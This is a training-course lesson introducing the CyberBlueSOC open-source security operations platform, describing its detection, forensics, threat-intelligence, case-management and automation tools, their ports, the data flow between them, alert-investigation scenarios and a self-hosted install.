Your Weapon System: CyberBlueSOC

What Is CyberBlueSOC?

You've learned what a SOC does, how attackers operate, and the ATT&CK framework that connects defense to offense. Now it's time to meet your training weapon system: CyberBlueSOC.

CyberBlueSOC is an open-source Blue Team platform that bundles 15+ integrated security tools into a unified ecosystem. Built on Docker containers and originally designed for self-hosted deployment, the tools that power CyberBlueSOC are the same ones used by enterprise SOCs worldwide. In this course, you'll access these tools through instant cloud labs — each lab spins up exactly the tools you need in seconds, pre-loaded with realistic data, ready for you to work.

Every tool that a Fortune 500 SOC analyst uses daily is here — Wazuh, Velociraptor, MISP, TheHive, Suricata, and more. You'll master them one at a time through hands-on labs, then combine them all in the Final Mission.

Platform Architecture

Before diving into individual tools, let's understand how CyberBlueSOC is architected. Every tool runs as a Docker container, and they communicate through well-defined APIs and shared data pipelines.

Click to enlarge

The architecture follows the same workflow you learned in Lesson 1.1: Collect → Detect → Investigate → Respond → Automate. Each category of tools maps to one or more stages of this cycle.

Click to enlarge

Let's walk through each tool category in detail.

🔵 SIEM & Detection

The SIEM (Security Information and Event Management) layer is the nerve center of any SOC. This is where logs from every source converge, get correlated, and generate alerts.

Wazuh — Your SIEM, XDR & Compliance Engine

Port: 7001 | Role: Log collection, rule-based detection, compliance monitoring

Wazuh is the core detection engine of CyberBlueSOC. It collects logs from endpoints (Windows Event Logs, Linux syslog, macOS unified logs), applications, cloud services, and network devices — then applies 3,000+ built-in detection rules to identify threats in real time.

Click to enlarge

What Wazuh does for you:

• Log Collection & Normalization — Agents on endpoints ship logs to the Wazuh manager, which normalizes them into a standard format
• Real-Time Detection — Rules written in XML detect everything from brute-force attacks to malware execution patterns
• MITRE ATT&CK Mapping — Every Wazuh rule maps to ATT&CK technique IDs, so alerts come pre-tagged with framework context
• File Integrity Monitoring (FIM) — Detects unauthorized changes to critical system files
• Vulnerability Detection — Scans installed packages against CVE databases
• Compliance Dashboards — PCI DSS, HIPAA, NIST 800-53 compliance status out of the box

Suricata — Network Intrusion Detection

Role: Signature-based network threat detection (IDS/IPS)

Suricata monitors network traffic in real time, applying thousands of signature rules to detect malicious patterns — port scans, exploit attempts, C2 beaconing, data exfiltration, and more. It integrates directly with Wazuh, feeding network-level alerts into the same dashboard as endpoint alerts.

EveBox — Suricata Event Viewer

Port: 7015 | Role: Suricata alert management and visualization

EveBox provides a clean, modern interface for browsing, searching, and managing Suricata alerts. Think of it as a dedicated network alert dashboard that makes it easy to investigate network-level detections.

Click to enlarge

🟢 Endpoint Detection & Response (EDR)

While the SIEM sees logs after they're written, EDR gives you live access to endpoints — the ability to query running processes, inspect memory, collect forensic artifacts, and even respond to threats in real time.

Velociraptor — Endpoint Visibility & Live Response

Port: 7000 | Role: EDR, digital forensics, incident response

Velociraptor is one of the most powerful open-source DFIR (Digital Forensics and Incident Response) tools available. It gives you the ability to:

• Query Endpoints Live — Write VQL (Velociraptor Query Language) queries that execute on endpoints and return results in seconds
• Collect Forensic Artifacts — Pre-built artifact collectors for browser history, prefetch files, registry hives, event logs, scheduled tasks, and hundreds more
• Hunt Across Your Fleet — Run a query against all endpoints simultaneously to find indicators of compromise
• Respond to Incidents — Kill processes, quarantine files, isolate endpoints from the network

Click to enlarge

🔍 Network Forensics

When you need to go beyond alerts and examine the actual packets that crossed the wire, these tools have you covered.

Arkime — Full Packet Capture & Search

Port: 7008 | Role: Network traffic recording, session search, packet analysis

Arkime (formerly Moloch) captures and indexes every packet on the network. When you see a suspicious alert in Wazuh or Suricata, you can pivot to Arkime and pull up the actual TCP sessions, see the full HTTP requests, examine file transfers, and reconstruct what happened on the wire.

Click to enlarge

Wireshark — Deep Packet Analysis

Port: 7099 | Role: Protocol-level packet inspection (browser-based)

CyberBlueSOC includes a browser-accessible Wireshark instance for deep protocol analysis. When Arkime shows you a suspicious session, you can export the PCAP and open it in Wireshark for byte-level inspection — examining TLS handshakes, DNS queries, protocol anomalies, and embedded payloads.

🟡 Threat Intelligence

Detection is only as good as the intelligence behind it. CyberBlueSOC integrates dedicated threat intelligence tools that feed IOCs (Indicators of Compromise) and adversary context into your detection and investigation workflows.

MISP — Threat Intelligence Platform

Port: 7003 | Role: IOC management, threat intel sharing, feed aggregation

MISP (Malware Information Sharing Platform) is the global standard for structured threat intelligence. In CyberBlueSOC, MISP comes pre-loaded with 280,000+ IOCs from 5 open-source threat feeds (abuse.ch, AlienVault OTX, CIRCL, and more), organized by threat actor, campaign, and ATT&CK technique.

Click to enlarge

How MISP powers your SOC:

• IOC Enrichment — When you encounter a suspicious IP, domain, or hash, query MISP to instantly check if it's a known malicious indicator
• Feed Aggregation — Automatically ingests threat feeds to keep your intelligence current, with auto-updates every Sunday at 2 AM
• Wazuh Integration — MISP feeds directly into Wazuh's CDB lists, enabling real-time alerting when endpoints communicate with known malicious infrastructure
• TheHive Integration — Observables in TheHive cases can be enriched with MISP data automatically

ATT&CK Navigator — Coverage Visualization

Port: 7013 | Role: MITRE ATT&CK technique coverage mapping

The ATT&CK Navigator provides a visual heatmap of your detection coverage mapped to the ATT&CK framework. You can see at a glance which techniques your Wazuh rules detect (green), which have partial coverage (yellow), and where you have blind spots (red).

Click to enlarge

🟠 Incident Response & Case Management

When an alert escalates to an incident, you need structured tools to manage the investigation, track tasks, and coordinate response across the team.

TheHive — Case Management

Port: 7005 | Role: Security incident case management and collaboration

TheHive is purpose-built for security operations. When a Wazuh alert requires investigation, you escalate it to a TheHive case. From there, you can:

• Create Structured Cases — With severity levels, TLP (Traffic Light Protocol) markings, and custom tags
• Track Observables — IPs, domains, hashes, email addresses — all linked to the case with analysis status
• Assign Tasks — Break the investigation into steps and assign them to team members
• Build Timelines — Document the chronological sequence of events for the incident report
• Integrate with Cortex — Automatically analyze observables against 100+ analyzers

Click to enlarge

Cortex — Observable Analysis Engine

Port: 7006 | Role: Automated analysis of observables (IPs, domains, hashes, files)

Cortex is TheHive's analysis companion. When you add an observable to a case (say, a suspicious IP address), Cortex can simultaneously run it through 100+ analyzers: VirusTotal, AbuseIPDB, Shodan, MISP, PassiveTotal, and many more. Instead of manually checking each service, Cortex does it all in parallel and returns a consolidated report.

Shuffle SOAR — Security Orchestration & Automation

Port: 7002 | Role: Workflow automation, playbook orchestration, tool integration

Shuffle is the automation backbone of CyberBlueSOC. It connects all tools through visual, drag-and-drop workflows (playbooks) that automate repetitive SOC tasks:

Click to enlarge

Example automated workflows:

• Alert Enrichment — Wazuh alert triggers → Shuffle extracts IOCs → queries MISP + VirusTotal → enriches the alert → creates a TheHive case if malicious
• Phishing Response — Reported phishing email → Shuffle extracts URLs and attachments → detonates in sandbox → blocks malicious URLs at firewall → notifies the user
• Threat Intel Ingestion — New IOC in MISP → Shuffle pushes it to Wazuh CDB lists → updates firewall block lists → logs the action

🛠️ Utility & Analysis Tools

CyberChef — The Data Swiss Army Knife

Port: 7004 | Role: Data encoding/decoding, analysis, transformation

CyberChef is an indispensable tool for SOC analysts. It handles hundreds of data transformation "recipes": Base64 decoding, URL decoding, hex-to-ASCII conversion, timestamp parsing, hash generation, XOR decryption, and much more. When you find obfuscated PowerShell in a Wazuh alert or encoded payloads in network traffic, CyberChef is where you decode them.

Click to enlarge

🗂️ Management & Monitoring

Fleet — Endpoint Inventory (osquery)

Port: 7007 | Role: osquery management, endpoint inventory, compliance queries

Fleet manages osquery agents on your endpoints, allowing you to run SQL-like queries against your entire fleet. Want to know which endpoints have a specific vulnerable software version? Which machines have unusual scheduled tasks? Fleet gives you those answers across hundreds or thousands of endpoints simultaneously.

Portainer — Container Management

Port: 9443 | Role: Docker container monitoring and management

Since CyberBlueSOC runs entirely on Docker, Portainer gives you visibility into every container: status, resource usage, logs, and the ability to restart services.

CyberBlueSOC Portal — Centralized Access

Port: 5443 (HTTPS) / 5500 (HTTP) | Role: Unified dashboard for all platform tools

The CyberBlueSOC Portal is your central command center. It provides a single web interface where you can see the status of every tool, access them with one click, and monitor container health. When you first set up the platform, this is the first page you'll visit.

Click to enlarge

Quick Reference: Every Tool at a Glance

Click to enlarge

Mapping Tools to SOC Scenarios

The real power of CyberBlueSOC becomes clear when you map tools to the scenarios you'll face as a SOC analyst. Here's your decision guide:

Scenario 1: "I see a high-severity alert in Wazuh"

1. Wazuh → Read the alert details, check the ATT&CK technique mapping
2. Velociraptor → Query the affected endpoint for running processes, network connections, recent file modifications
3. MISP → Check any suspicious IPs, domains, or hashes against threat intelligence
4. TheHive → If confirmed malicious, create a case and begin structured investigation

Scenario 2: "Suricata flagged outbound C2 traffic"

1. EveBox → Review the Suricata alert and its signature details
2. Arkime → Pull up the full network session, examine packet payloads
3. MISP → Cross-reference the destination IP/domain with known C2 infrastructure
4. Velociraptor → Investigate the source endpoint for compromise indicators
5. Shuffle → Automate blocking the C2 IP at the firewall

Scenario 3: "Suspicious encoded PowerShell detected"

1. Wazuh → Read the original alert and extract the encoded command
2. CyberChef → Decode the Base64/obfuscated content to reveal the actual payload
3. MISP → Check file hashes or domains found in the decoded payload
4. Velociraptor → Hunt for the PowerShell execution across all endpoints
5. TheHive → Document findings, assign containment tasks

Scenario 4: "I need to assess our detection coverage"

1. ATT&CK Navigator → Visualize current coverage mapped to techniques
2. Wazuh → Review which rule groups are active and their ATT&CK mappings
3. MISP → Check intelligence on techniques used by threat actors targeting your sector
4. Shuffle → Build a workflow to regularly export coverage metrics

How Data Flows Through the Platform

Understanding the data flow is critical for effective investigation. Here's how information moves through CyberBlueSOC during a typical alert lifecycle:

ENDPOINT                    NETWORK
  │                            │
  │ Wazuh Agent               │ Suricata
  │ (logs, FIM, vuln)         │ (packets, signatures)
  ▼                            ▼
┌─────────────────────────────────────┐
│         WAZUH MANAGER               │
│  (correlation, rules, alerting)     │
│  3000+ rules × ATT&CK mapping      │
└──────────┬──────────────────────────┘
           │
     ┌─────┴──────┐
     │  ALERT     │
     │  GENERATED │
     └─────┬──────┘
           │
    ┌──────┴───────────────────────┐
    │                              │
    ▼                              ▼
┌──────────┐              ┌──────────────┐
│ MISP     │              │ VELOCIRAPTOR  │
│ (enrich  │              │ (investigate  │
│  IOCs)   │              │  endpoint)    │
└────┬─────┘              └──────┬───────┘
     │                           │
     └───────────┬───────────────┘
                 │
                 ▼
          ┌────────────┐
          │  THE HIVE  │
          │  (case     │──→ CORTEX (analyze)
          │  mgmt)     │
          └──────┬─────┘
                 │
                 ▼
          ┌────────────┐
          │  SHUFFLE   │──→ Block, Notify,
          │  (automate)│    Update, Report
          └────────────┘

How You'll Access These Tools

In this course, you don't need to install anything. Each lab provides instant cloud access to exactly the tools you need for that exercise.

Per-Lab Cloud Environments

When you click "Start Lab" on any lab page, the platform spins up a dedicated environment with only the containers that lab requires — pre-loaded with the exact data you need to complete the exercise. Here's how it works:

Each lab is disposable — when you're done (or after 2 hours idle), it's automatically destroyed. No cleanup, no state from previous labs, every session starts fresh.

Self-Hosted Option: Run Your Own CyberBlueSOC

Everything you use in this course is built on CyberBlueSOC — a fully open-source platform available on GitHub. If you want your own permanent lab environment with all 15+ tools running locally, you absolutely can:

git clone https://github.com/CyberBlu3s/CyberBlue.git
cd CyberBlue
chmod +x cyberblue_install.sh
./cyberblue_install.sh

The install is fully automated and takes about 30 minutes. When it's done, you'll have the full SOC stack accessible through the CyberBlueSOC Portal at https://YOUR_IP:5443.

What you get with self-hosted:

Self-hosted is ideal if you:

• Want to experiment freely beyond the course exercises
• Are setting up a lab for a university class or team
• Prefer to keep all data on your own infrastructure
• Want to practice the real-world skill of deploying and maintaining a SOC stack

What Comes Next

You now have a complete mental map of the CyberBlueSOC platform — every tool, its purpose, and how they interconnect. In the upcoming modules, you'll go from overview to hands-on mastery:

• Module 2: Wazuh SIEM Mastery — Deep dive into alert triage, rule writing, dashboard customization, and detection engineering
• Module 3: Network Detection with Suricata — Signature writing, traffic analysis, and network hunting
• Module 4: Threat Intelligence with MISP — Feed management, IOC correlation, and integration with detection tools
• Module 5: Velociraptor DFIR — VQL queries, artifact collection, endpoint forensics, and incident response
• Module 6: Case Management with TheHive & Cortex — Structured incident response workflows
• Module 7: Automation with Shuffle SOAR — Building playbooks that make your SOC faster and more consistent

Your weapon system is loaded and ready. Click "Start Lab" and get your hands on it.

IOC Search & Investigation

One of the most common daily tasks for SOC analysts is searching for Indicators of Compromise across your toolset. CyberBlueSOC makes this seamless by providing integrated search capabilities.

Click to enlarge

When you receive an alert or intelligence report, you can search for IOCs across:

• Wazuh — Search logs and alerts for IP addresses, file hashes, user accounts
• MISP — Cross-reference against 280K+ known indicators with full context
• Arkime — Search network sessions by IP, port, protocol, or content
• Velociraptor — Hunt for file hashes, process names, or registry keys across all endpoints

Operational Metrics & Monitoring

A mature SOC doesn't just detect threats — it measures its own effectiveness. CyberBlueSOC provides built-in dashboards for tracking key operational metrics.

Click to enlarge

Key metrics to track:

• Mean Time to Detect (MTTD) — How quickly your rules catch threats
• Mean Time to Respond (MTTR) — How quickly you contain and remediate incidents
• Alert Volume by Severity — Distribution of critical, high, medium, and low alerts
• Detection Coverage — Percentage of ATT&CK techniques you can detect
• False Positive Rate — Percentage of alerts that turn out to be benign

These metrics will become central to your growth as an analyst. As you progress through the course, you'll learn to not just monitor these dashboards, but to improve the numbers by writing better detection rules, tuning alert thresholds, and automating repetitive responses.